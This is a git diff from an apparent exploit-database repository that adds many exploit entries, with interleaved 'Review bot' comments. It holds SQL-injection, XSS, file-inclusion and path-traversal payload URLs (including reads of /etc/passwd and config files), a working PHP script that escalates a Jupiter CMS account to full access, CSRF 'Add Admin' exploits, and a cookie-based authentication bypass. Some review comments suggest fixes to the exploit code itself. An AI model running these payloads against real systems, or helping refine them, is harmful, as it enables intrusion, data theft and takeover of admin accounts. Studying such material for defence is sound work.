+http://www.example.com/main.swf?baseurl=asfunction:getURL,javascript:alert(1)// \ No newline at end of file diff --git a/platforms/multiple/remote/30933.php b/platforms/multiple/remote/30933.php new file mode 100755 index 000000000..321184c13 --- /dev/null +++ b/platforms/multiple/remote/30933.php 
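Review bot: `#define BUFFSZ (BOFSZ + 32)` has no comment tying the 32-byte headroom to what main() actually writes around the filename — 4 + 6 bytes of header before `putsc(p, 'A', BOFSZ)` and 1 + 4 bytes after it, 15 bytes in total — so a later change to that header layout could silently outgrow the malloc'd buffer without anything catching it. `#define BUFFSZ (BOFSZ + 32) // headroom for the 15 header/trailer bytes written around the BOFSZ-byte name` records the invariant, and an `if(p - buff > BUFFSZ) std_err();` before the fwrite() would turn a future mismatch into a visible error. The `fwrite(buff, 1, p - buff, fd)` length is already derived from `p`, so no other line depends on the constant.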
@@ -0,0 +1,59 @@ +source: http://www.securityfocus.com/bid/27007/info + +Zoom Player is prone to a buffer-overflow vulnerability. + +An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the affected application or to crash the application, denying further service to legitimate users. + +This issue affects Zoom Player 6.00 beta 2 and all releases contained in the Zoom Player 5 branch. + + \ No newline at end of file diff --git a/platforms/php/remote/30928.php b/platforms/php/remote/30928.php new file mode 100755 index 000000000..0516c46fa --- /dev/null +++ b/platforms/php/remote/30928.php @@ -0,0 +1,144 @@ +source: http://www.securityfocus.com/bid/27001/info + +PDFlib is prone to multiple buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied input. + +Attackers can exploit these issues to execute arbitrary code in the context of applications that use the library. Failed attacks will cause denial-of-service conditions. + +PDFlib 7.02 is vulnerable; other versions may also be affected. + + + + + + +Jupiter 1.1.5ex Privileges Escalation + + + +
+Target URL (whit trailing slash) :

+http://

+Username :

+

+Password :

+

+*First Create an account on target!
+The exploit will login with this username and password and then grants +full access to this account!

+ +
+No response from '.htmlentities($host).'
'); +} + +if(isset($_POST['start'])) +{ + if ($_POST['target'] == '' || $_POST['username'] == '' || +$_POST['username'] == '') + { + die('Error : All fields are required!'); + } + $Target = trim($_POST['target']); + $Username = trim($_POST['username']); + $Password = trim($_POST['password']); + $Target .= ($Target[strlen($Target)-1] <> '/') ? '/' : ''; + $host = substr($Target, 0 ,strpos($Target, '/')); + $path = substr($Target, strpos($Target, '/')); + $Query1 = $path.'index.php'; + $packet1 = "HEAD $Query1 HTTP/1.1\r\n"; + $packet1 .= "User-Agent: Shareaza v1.x.x.xx\r\n"; + $packet1 .= "Host: ".$host."\r\n"; + $packet1 .= "Connection: Close\r\n\r\n"; + sendpacket($packet1); + echo nl2br(htmlentities($html)); + $Pattern = "(PHPSESSID=[a-z0-9]{20,32})"; + if(preg_match($Pattern, $html, $Matches)) + { + $Match = $Matches[0]; + $PHPSESSID = substr($Match, 10, strlen($Match)); + } + $Query2 = $path.'index.php?n=modules/login'; + $packet2 = "POST +$Query2&username=$Username&password=$Password&submit=Login&PHPSESSID=$PHPSESSID +HTTP/1.1\r\n"; + $packet2 .= "User-Agent: Shareaza v1.x.x.xx\r\n"; + $packet2 .= "Host: ".$host."\r\n"; + $packet2 .= "Connection: Close\r\n\r\n"; + sendpacket($packet2); + if(stristr($html , 'i=1') == true) + { + die('Error : Incorrect username or password! 
Try +again!'); + } else + if(stristr($html , 'i=5') == true) + { + die('Error : Someone is currently using that account!'); + } else + $RandMail = substr($PHPSESSID, 10, 6).'_mail@none.com'; + $Query3 = +$path.'index.php?n=modules/panel&a=2&tmp[authorization]=4'; + $packet3 = "POST +$Query3&editpassword=&editpassword2=&editemail=$RandMail&edittemplate=default&editurl=&editflag=none&editday=0&editmonth=0&edityear=0&edithideemail=0&editcalendarbday=0&editmsn=&edityahoo=&editicq=&editaim=&editskype=&editsignature=&editaboutme=&PHPSESSID=$PHPSESSID +HTTP/1.1\r\n"; + $packet3 .= "User-Agent: Shareaza v1.x.x.xx\r\n"; + $packet3 .= "Host: ".$host."\r\n"; + $packet3 .= "Connection: Close\r\n\r\n"; + sendpacket($packet3); + if(stristr($html , 'i=26') == false) + { + die('Exploit Failed'); + } + $Query4 = $path.'index.php?n=modules/login&a=1'; + $packet4 = "POST $Query4&PHPSESSID=$PHPSESSID HTTP/1.1\r\n"; + $packet4 .= "User-Agent: Shareaza v1.x.x.xx\r\n"; + $packet4 .= "Host: ".$host."\r\n"; + $packet4 .= "Connection: Close\r\n\r\n"; + sendpacket($packet4); + die('Exploit succeeded! You have Full access now!'); +} +?> + diff --git a/platforms/php/webapps/30892.txt b/platforms/php/webapps/30892.txt new file mode 100755 index 000000000..57267cc76 --- /dev/null +++ b/platforms/php/webapps/30892.txt 
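Review bot: The required-field check `if ($_POST['target'] == '' || $_POST['username'] == '' || $_POST['username'] == '')` tests `username` twice and never tests `password`, so an empty password passes validation and is trimmed into `$Password` unnoticed; the third clause should read `$_POST['password'] == ''`. Further down, `$PHPSESSID` is only assigned inside the `if(preg_match($Pattern, $html, $Matches))` branch, so when the pattern does not match it is interpolated into `$packet2` while undefined; initialising it to `''` before the match, or dying with an explicit message when no session id was found, makes that failure visible instead of silent. Much of this hunk (the HTML form and the body of sendpacket() before `No response from`) appears stripped from this view, so those lines were not reviewed.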
@@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/26896/info + +Neuron News is prone to multiple input-validation vulnerabilities, including an SQL-injection issue and two cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +These issues affect Neuron News 1.0; other versions may also be affected. + +http://www.example.com/patch/?q='/**/union/**/select/**/1,2,adminmail,4,id/**/from/**/neuronnews_configuration/* +http://www.example.com/patch/?q=viewtopic&topic= +http://www.example.com/patch/?q=newsarchive&newsyear= +http://www.example.com/patch/?q=newsarchive&newsyear=&newsmonth= diff --git a/platforms/php/webapps/30893.txt b/platforms/php/webapps/30893.txt new file mode 100755 index 000000000..1dbe00bb4 --- /dev/null +++ b/platforms/php/webapps/30893.txt 
@@ -0,0 +1,19 @@ +source: http://www.securityfocus.com/bid/26898/info + +PHP Security Framework is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues and remote file-include issues. + +A successful exploit may allow an attacker to execute malicious code within the context of the webserver process, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +PHP Security Framework Beta 1 is vulnerable; other versions may also be affected. + +http://www.example.com/PSF/lib/base.inc.php?MODEL_DIR=http://www.example2.com/ +http://www.example.com/PSF/lib/base.inc.php?DAO_DIR=/etc/passwd%00 + +POST http://www.example.com/PSF/index.php?page=authentification HTTP/1.1\r\n +Host: localhost\r\n +Connection: keep-alive\r\n +Content-Type: application/x-www-form-urlencoded\r\n +Content-Length: \r\n\r\n +username=8%27+union+select+CHR%2856%29%2CCHR%2857%29%2CCHR%2857%29%2CCHR%2857%29+FROM+psf_administrator-----------&password=9&page=authentification&button=Log+in\r\n\r\n + +SQL-query: select * from psf_administrator WHERE username='8\\\\\\\\\\\\\\\'union select CHR(56),CHR(57),CHR(57),CHR(57) FROM psf_administrator-----------' \ No newline at end of file diff --git a/platforms/php/webapps/30899.txt b/platforms/php/webapps/30899.txt new file mode 100755 index 000000000..21a9ac115 --- /dev/null +++ b/platforms/php/webapps/30899.txt 
@@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/26922/info + +Mambo is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Mambo 4.6.2 is vulnerable; other versions may also be affected. + +http://localhost/mambo/http://localhost/index.php?option=com_frontpage&Itemid=>"> http://localhost/index.php?option=>">&Itemid=1 \ No newline at end of file diff --git a/platforms/php/webapps/30909.html b/platforms/php/webapps/30909.html new file mode 100755 index 000000000..f90aba609 --- /dev/null +++ b/platforms/php/webapps/30909.html @@ -0,0 +1,36 @@ +Auto Classifieds Script v2.0 - CSRF Vulnerabilty [Add Admin] +==================================================================== + +#################################################################### +.:. Author : HackXBack +.:. Contact : h-b@usa.com +.:. Home : http://www.iphobos.com/blog/ +.:. Script : +http://www.phpjabbers.com/preview/auto-classifieds-script/ + +#################################################################### + +===[ Exploit ]=== + +Cross Site Request Forgery +=========================== + +[Add Admin] + + + +
+ + + + + + +
+ + + + + +#################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/30910.txt b/platforms/php/webapps/30910.txt new file mode 100755 index 000000000..63da7785f --- /dev/null +++ b/platforms/php/webapps/30910.txt @@ -0,0 +1,83 @@ +Job Listing Script - Multiple Vulnerabilties +==================================================================== + +#################################################################### +.:. Author : HackXBack +.:. Contact : h-b@usa.com +.:. Home : http://www.iphobos.com/blog/ +.:. Script : http://www.phpjabbers.com/preview/job-listing-script/ +#################################################################### + +===[ Exploit ]=== + +[1] Cross Site Request Forgery +============================== + +[Change Username/Password Admin] + + + +
+ + + + + + + + + + + + +
+ + + + +[2] Multiple Cross Site Scripting +================================== + +# CSRF with XSS Exploit: + +I. Xss In Categories + + + +
+ + +
+ + + +II. Xss In Type + + + +
+ + +
+ + + +III. Xss In Country + + + +
+ + +
+ + +#################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/30911.txt b/platforms/php/webapps/30911.txt new file mode 100755 index 000000000..4d251457c --- /dev/null +++ b/platforms/php/webapps/30911.txt @@ -0,0 +1,64 @@ +Appointment Scheduler V2.0 - Multiple Vulnerabilities +========================================================================= + +#################################################################### +.:. Author : HackXBack +.:. Contact : h-b@usa.com +.:. Home : http://www.iphobos.com/blog/ +.:. Script : http://www.phpjabbers.com/appointment-scheduler/ +#################################################################### + +===[ Exploit ]=== + +[1] Cross Site Scripting +========================= + +# CSRF with XSS Exploit: + + + + +
+ + + + + + + + + +
+ + + + +[2] Cross Site Request Forgery +=============================== + +[Add Admin] + + + +
+ + + + + + +
+ + + +
+ + + + + + + +
+ + + + +II. Non-Persistent XSS + +www.site.com/index.php?controller=AdminBookings&action=index&p_date=XSS + +www.site.com/index.php?controller=AdminBookings&action=index&p_date= +">"/> + + + +[2] Cross Site Request Forgery +=============================== + +[Change Username/Password Admin] + + + +
+ + + + + + + + +
+ + + +#################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/30913.txt b/platforms/php/webapps/30913.txt new file mode 100755 index 000000000..2ba6ac76f --- /dev/null +++ b/platforms/php/webapps/30913.txt @@ -0,0 +1,93 @@ +Event Booking Calendar V2.0 - Multiple Vulnerabilities +==================================================================== + +#################################################################### +.:. Author : HackXBack +.:. Contact : h-b@usa.com +.:. Home : http://www.iphobos.com/blog/ +.:. Script : www.phpjabbers.com/event-booking-calendar/ +.:. Dork : inurl:"load-calendar.php" +#################################################################### + +===[ Exploit ]=== + +[1] multiple Blind Ijection +============================ + +www.site.com/script/load-calendar.php?view=1&month=6&year=2013&cid=1[inject] +www.site.com/script/load-calendar.php?cid=1[inject] + +www.site.com/script/load-calendar.php?view=1&month=6&year=2013&cid=1+and+1=1 +>>True +www.site.com/script/load-calendar.php?view=1&month=6&year=2013&cid=1+and+1=2 +>>False + +www.site.com/script/load-calendar.php?view=1&month=6&year=2013&cid=1+and+substring(@@version,1,1)=5 +>>True +www.site.com/script/load-calendar.php?view=1&month=6&year=2013&cid=1+and+substring(@@version,1,1)=4 +>>False + + + +[2] Cross Site Request Forgery +============================== + +[Change Username/Password Admin] + + + +
+ + + + +
+ + + + +[3] Multiple Cross Site Scripting +================================= + +# CSRF with XSS Exploit: + +I. Xss In Event + + + + +
+ + + + + + + + + + + + +
+ + + +II. Xss In Categories + + + + +
+ + +
+ + + +#################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/30916.txt b/platforms/php/webapps/30916.txt new file mode 100755 index 000000000..9e44f4e71 --- /dev/null +++ b/platforms/php/webapps/30916.txt 
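Review bot: The blind SQL injection PoCs for `cid` in `load-calendar.php` append `+and+1=1` with no quote terminator, which indicates the parameter is concatenated into the query as a bare number; the advisory should say so (numeric context) and name the fix, casting `cid` to int or binding it in a prepared statement. The dork `inurl:"load-calendar.php"` suggests the endpoint is reachable without authentication, which would make this the most severe of the three issues, but the text never states whether a session is required. As in the other HackXBack entries, the CSRF/XSS form bodies render as empty `+` lines, so the parameter names for the stored XSS in Event and Categories are not visible here. The heading `[1] multiple Blind Ijection` should read `Blind SQL Injection`.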
@@ -0,0 +1,59 @@ +Advisory ID: HTB23192 +Product: Burden +Vendor: Josh Fradley +Vulnerable Version(s): 1.8 and probably prior +Tested Version: 1.8 +Advisory Publication: December 18, 2013 [without technical details] +Vendor Notification: December 18, 2013 +Vendor Patch: December 18, 2013 +Public Disclosure: January 8, 2014 +Vulnerability Type: Improper Authentication [CWE-287] +CVE Reference: CVE-2013-7137 +Risk Level: High +CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) +Solution Status: Fixed by Vendor +Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) + +----------------------------------------------------------------------------------------------- + +Advisory Details: + +High-Tech Bridge Security Research Lab discovered vulnerability in application authentication mechanism in Burden, which can be exploited by remote non-authenticated attacker to gain administrative access to the vulnerable application. + + +1) Improper Authentication in Burden: CVE-2013-7137 + +The vulnerability exists due to insufficient authentication when handling "burden_user_rememberme" cookie parameter. A remote unauthenticated user can set "burden_user_rememberme" cookie to "1" and gain administrative access to the application. + +The exploitation example below shows HTTP GET request that grants administrative privileges to the user: + + +GET /login.php HTTP/1.1 + +Cookie: burden_user_rememberme=1; + + +The cookie can be also changed using a browser plugin such as Firebug for FireFox. + +----------------------------------------------------------------------------------------------- + +Solution: + +Update to Burden 1.8.1 + +More Information: +https://github.com/joshf/Burden/releases/tag/1.8.1 + +----------------------------------------------------------------------------------------------- + +References: + +[1] High-Tech Bridge Advisory HTB23192 - https://www.htbridge.com/advisory/HTB23192 - Improper Authentication in Burden. 
+[2] Burden - https://github.com/joshf - Burden is a full featured task management app written in PHP. +[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. +[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. +[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing. + +----------------------------------------------------------------------------------------------- + +Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \ No newline at end of file diff --git a/platforms/php/webapps/30917.txt b/platforms/php/webapps/30917.txt new file mode 100755 index 000000000..27cd93f71 --- /dev/null +++ b/platforms/php/webapps/30917.txt 
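Review bot: The root cause described — setting `burden_user_rememberme=1` grants administrative access — means the remember-me cookie is consumed as a trusted boolean rather than a credential, and the advisory should state the correct fix so readers can check 1.8.1 against it: a long random token stored server-side, bound to a user record, with expiry and a constant-time compare, not merely a different expected value. The example `GET /login.php` with only that cookie shows the bypass needs no valid account, which is consistent with the `Au:N` vector given. Naming the file or function in Burden that reads the cookie would help, since the advisory otherwise gives no code location for CVE-2013-7137.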
@@ -0,0 +1,62 @@ +Advisory ID: HTB23191 +Product: Horizon QCMS +Vendor: Horizon QCMS +Vulnerable Version(s): 4.0 and probably prior +Tested Version: 4.0 +Advisory Publication: December 18, 2013 [without technical details] +Vendor Notification: December 18, 2013 +Vendor Patch: December 25, 2013 +Public Disclosure: January 8, 2014 +Vulnerability Type: Path Traversal [CWE-22], SQL Injection [CWE-89] +CVE References: CVE-2013-7138, CVE-2013-7139 +Risk Level: High +CVSSv2 Base Scores: 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N), 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) +Solution Status: Fixed by Vendor +Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) + +----------------------------------------------------------------------------------------------- + +Advisory Details: + +High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Horizon QCMS, which can be exploited to read contents of arbitrary files and perform SQL Injection attacks. + + +1) Path Traversal in Horizon QCMS: CVE-2013-7138 + +The vulnerability exists due to insufficient filtration of "start" HTTP GET parameter passed to "/lib/functions/d-load.php" script before using it in PHP "fopen()" function. A remote attacker can read contents of arbitrary files on the target system with privileges of the web server. + +The exploitation example below will display content of "/config.php" file that contains MySQL database login credentials: + +http://[host]/lib/functions/d-load.php?start=../../config.php + + +2) SQL Injection in Horizon QCMS: CVE-2013-7139 + +The vulnerability exists due to insufficient validation of "category" HTTP POST parameter passed to "/download.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database. 
+ +The exploitation example below displays version of MySQL server: + +http://[host]/download.php?category=%27%20union%20select%201,2,version(),4,5,6%20--%202 + +----------------------------------------------------------------------------------------------- + +Solution: + +Apply security patch for Horizon 4.0 + +More Information: +http://sourceforge.net/projects/hnqcms/files/patches/ + +----------------------------------------------------------------------------------------------- + +References: + +[1] High-Tech Bridge Advisory HTB23191 - https://www.htbridge.com/advisory/HTB23191 - Multiple vulnerabilities in Horizon QCMS. +[2] Horizon QCMS - http://www.hnqcms.com/ - An open source Horizon Quick Content Managment System with PHP and MySQL support. +[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. +[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. +[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing. + +----------------------------------------------------------------------------------------------- + +Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \ No newline at end of file diff --git a/platforms/php/webapps/30918.txt b/platforms/php/webapps/30918.txt new file mode 100755 index 000000000..077afc58b --- /dev/null +++ b/platforms/php/webapps/30918.txt 
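Review bot: Issue 2 describes `category` as an HTTP POST parameter, but the exploitation example sends it in the query string of `http://[host]/download.php?category=...`; one of the two is wrong and should be corrected so the PoC for CVE-2013-7139 is reproducible. For issue 1 the `../../` depth is consistent with the script sitting two levels below the webroot (`/lib/functions/d-load.php`), but because the stated sink is `fopen()`, "read contents of arbitrary files" only holds if d-load.php also streams the handle back to the client — worth stating. The SQLi payload also assumes a six-column SELECT and a string context (leading `%27`), which is fine for a PoC but could be noted explicitly.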
@@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/26961/info + +iSupport is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. + +Exploiting this issue may allow an unauthorized user to view files and execute local scripts. + +This issue affects iSupport 1.8; other versions may also be affected. + + +http://www.example.com/iSupport/index.php?include_file=[local file] +http://www.example.com/helpdesk/index.php?include_file=../../../../../proc/self/environ +http://www.example.com/helpdesk/index.php?include_file=../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/30921.txt b/platforms/php/webapps/30921.txt new file mode 100755 index 000000000..5d5bfc8ea --- /dev/null +++ b/platforms/php/webapps/30921.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/26977/info + +MRBS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +This issue was previously documented as a vulnerability in Moodle. Further reports indicate this issue affects MRBS, and the MRBS module for Moodle. + +http://www.example.com/PATH/moodle/ing/blocks/mrbs/code/web/view_entry.php?id=2000%20UNION%20SELECT%20username,id,id,id,id,id,id,id,id,id,id,id%20FROM%20mdl_user%20WHERE%20id=[ID]&day=27&month=10&year=2007 \ No newline at end of file diff --git a/platforms/php/webapps/30923.txt b/platforms/php/webapps/30923.txt new file mode 100755 index 000000000..e7af804c4 --- /dev/null +++ b/platforms/php/webapps/30923.txt 
@@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/26987/info + +MyBlog is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. + +Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +http://www.example.com/[path]/games.php?id=[Sh3ll-Script] \ No newline at end of file diff --git a/platforms/php/webapps/30924.txt b/platforms/php/webapps/30924.txt new file mode 100755 index 000000000..eabd18af7 --- /dev/null +++ b/platforms/php/webapps/30924.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/26992/info + +Dokeos is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +These issues affect Dokeos 1.8.4 and earlier versions. + +http://www.example.com/main/forum/viewthread.php?forum=XSS \ No newline at end of file diff --git a/platforms/php/webapps/30925.txt b/platforms/php/webapps/30925.txt new file mode 100755 index 000000000..3a7802210 --- /dev/null +++ b/platforms/php/webapps/30925.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/26992/info + +Dokeos is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +These issues affect Dokeos 1.8.4 and earlier versions. + +http://www.example.com/main/forum/viewforum.php?cidReq=[Forum-ID]&forum=XSS 
diff --git a/platforms/php/webapps/30926.txt b/platforms/php/webapps/30926.txt new file mode 100755 index 000000000..80fa38b76 --- /dev/null +++ b/platforms/php/webapps/30926.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/26992/info + +Dokeos is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +These issues affect Dokeos 1.8.4 and earlier versions. + +http://www.example.com/main/work/work.php?cidReq=[Forum-ID]&curdirpath=/&display_upload_form=true&origin=XSS + diff --git a/platforms/php/webapps/30927.txt b/platforms/php/webapps/30927.txt new file mode 100755 index 000000000..a9da16fe8 --- /dev/null +++ b/platforms/php/webapps/30927.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/26998/info + +ThemeSiteScript is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. + +Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +ThemeSiteScript 1.0 is reported vulnerable; other versions may be affected as well. + +http://www.example.com/admin/index.php?loadadminpage=http://www.example2.com + + diff --git a/platforms/php/webapps/30929.txt b/platforms/php/webapps/30929.txt new file mode 100755 index 000000000..0a70f5894 --- /dev/null +++ b/platforms/php/webapps/30929.txt 
@@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/27003/info + +Logaholic is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues, a cross-site scripting issue, and an HTML-injection issue. The issues occur because the application fails to sufficiently sanitize user-supplied data. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/logaholic/update.php?conf=nameofprofile&page=SQL INjection \ No newline at end of file diff --git a/platforms/php/webapps/30930.txt b/platforms/php/webapps/30930.txt new file mode 100755 index 000000000..fd5563139 --- /dev/null +++ b/platforms/php/webapps/30930.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/27003/info + +Logaholic is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues, a cross-site scripting issue, and an HTML-injection issue. The issues occur because the application fails to sufficiently sanitize user-supplied data. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/logaholic/index.php?conf=nameofprofile&from=SQL INJECTION \ No newline at end of file diff --git a/platforms/php/webapps/30931.txt b/platforms/php/webapps/30931.txt new file mode 100755 index 000000000..946e69f93 --- /dev/null +++ b/platforms/php/webapps/30931.txt 
@@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/27003/info + +Logaholic is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues, a cross-site scripting issue, and an HTML-injection issue. The issues occur because the application fails to sufficiently sanitize user-supplied data. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/index.php?conf= \ No newline at end of file diff --git a/platforms/php/webapps/30932.txt b/platforms/php/webapps/30932.txt new file mode 100755 index 000000000..40fbf78e9 --- /dev/null +++ b/platforms/php/webapps/30932.txt @@ -0,0 +1,8 @@ +source: http://www.securityfocus.com/bid/27003/info + +Logaholic is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues, a cross-site scripting issue, and an HTML-injection issue. The issues occur because the application fails to sufficiently sanitize user-supplied data. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +POST variable "newconfname" in profiles.php?conf=nameofprofile to +>">alert(xss)%3B in /logaholic/profiles.php \ No newline at end of file diff --git a/platforms/php/webapps/30937.txt b/platforms/php/webapps/30937.txt new file mode 100755 index 000000000..f51a84228 --- /dev/null +++ b/platforms/php/webapps/30937.txt 
@@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/27027/info + +Limbo CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Limbo CMS 1.0.4.2 is vulnerable; other versions may also be affected. + +http://www.example.com/admin.php?com_option=>"'> \ No newline at end of file diff --git a/platforms/windows/dos/30773.txt b/platforms/windows/dos/30773.txt new file mode 100755 index 000000000..4ada4cfa3 --- /dev/null +++ b/platforms/windows/dos/30773.txt 
@@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/26468/info + +Microsoft Jet Database Engine is prone to a buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data. + +Remote attackers can exploit this issue to execute arbitrary machine code in the context of a user running the application. Successful exploits will compromise the affected application and possibly the underlying computer. Failed attacks will likely cause denial-of-service conditions. + +NOTE: Further details report that attackers are using malicious Word files to load specially crafted MDB files. Microsoft has released a knowledge base article (950627) documenting this attack vector. + +This issue does not affect Windows Server 2003 Service Pack 2, Windows XP Service Pack 3, Windows XP x64 edition Server Pack 2, Windows Vista, Windows Vista Service Pack 1 and Windows Server 2008 because they run a version of the Jet Database Engine that isn't vulnerable. + +This issue does affect the Jet Database Engine, Microsoft Word 2000 Service Pack 3, Microsoft Word 2002 Service Pack 3, Microsoft Word 2003 Service Pack 2, Microsoft Word 2003 Service Pack 3, Microsoft Word 2007, and Microsoft Word 2007 Service Pack 1 on Microsoft Windows 2000, Windows XP, or Windows Server 2003 Service Pack 1. + +http://www.exploit-db.com/sploits/30773.mdb \ No newline at end of file diff --git a/platforms/windows/dos/30936.html b/platforms/windows/dos/30936.html new file mode 100755 index 000000000..e90004c67 --- /dev/null +++ b/platforms/windows/dos/30936.html 
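Review bot: The entry carries no CVE or vendor bulletin reference, only the KB 950627 workaround article, even though this Jet MDB parsing overflow was later addressed by a Microsoft security bulletin (MS08-028 / CVE-2007-6026, if I recall correctly — confirm before adding). The only trigger is the external binary link `http://www.exploit-db.com/sploits/30773.mdb`, so nothing in this text demonstrates the bug itself; a one-line statement of which MDB structure or field is oversized would make the entry useful without the sample. `Windows XP x64 edition Server Pack 2` should read `Service Pack 2`.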
@@ -0,0 +1,40 @@ +source: http://www.securityfocus.com/bid/27026/info + +AOL Picture Editor 'YGPPicEdit.dll' ActiveX control is prone to multiple vulnerabilities that attackers can exploit to crash the application. The issues stem from various buffer-overflow conditions. + +An attacker can exploit these issues by enticing an unsuspecting victim to visit a malicious HTML page. + +Successfully exploiting these issues may allow remote attackers to crash the affected application using the ActiveX control (typically Internet Explorer), denying service to legitimate users. Reports indicate that this issue may not be exploited to execute arbitrary code. + +AOL Picture Editor 'YGPPicEdit.dll' 9.5.1.8 is vulnerable; other versions may also be affected. + + + + + + + + + + + + diff --git a/platforms/windows/local/30468.pl b/platforms/windows/local/30468.pl index 8249cef48..abd6283ac 100755 --- a/platforms/windows/local/30468.pl +++ b/platforms/windows/local/30468.pl @@ -1,14 +1,14 @@ -?#!/usr/bin/perl +#!/usr/bin/perl #-----------------------------------------------------------------------------# # Exploit Title: RealNetworks RealPlayer Version Attribute Buffer Overflow # -# Date: Dec 20, 2013 # +# Date: Dec 20 2013 # # Exploit Author: Gabor Seljan # # Vendor Homepage: http://www.real.com # # Software Link: http://www.oldapps.com/real.php?old_real_player=12814 # -# Version: 16.0.3.51 and 16.0.2.32 # -# Tested on: Windows XP SP2/SP3 (NX) # -# CVE: CVE-2013-6877 # +# Version: 16.0.3.51, 16.0.2.32 # +# Tested on: Windows XP SP2/SP3 (DEP Bypass) # +# CVE: CVE-2013-7260 # #-----------------------------------------------------------------------------# use strict; 
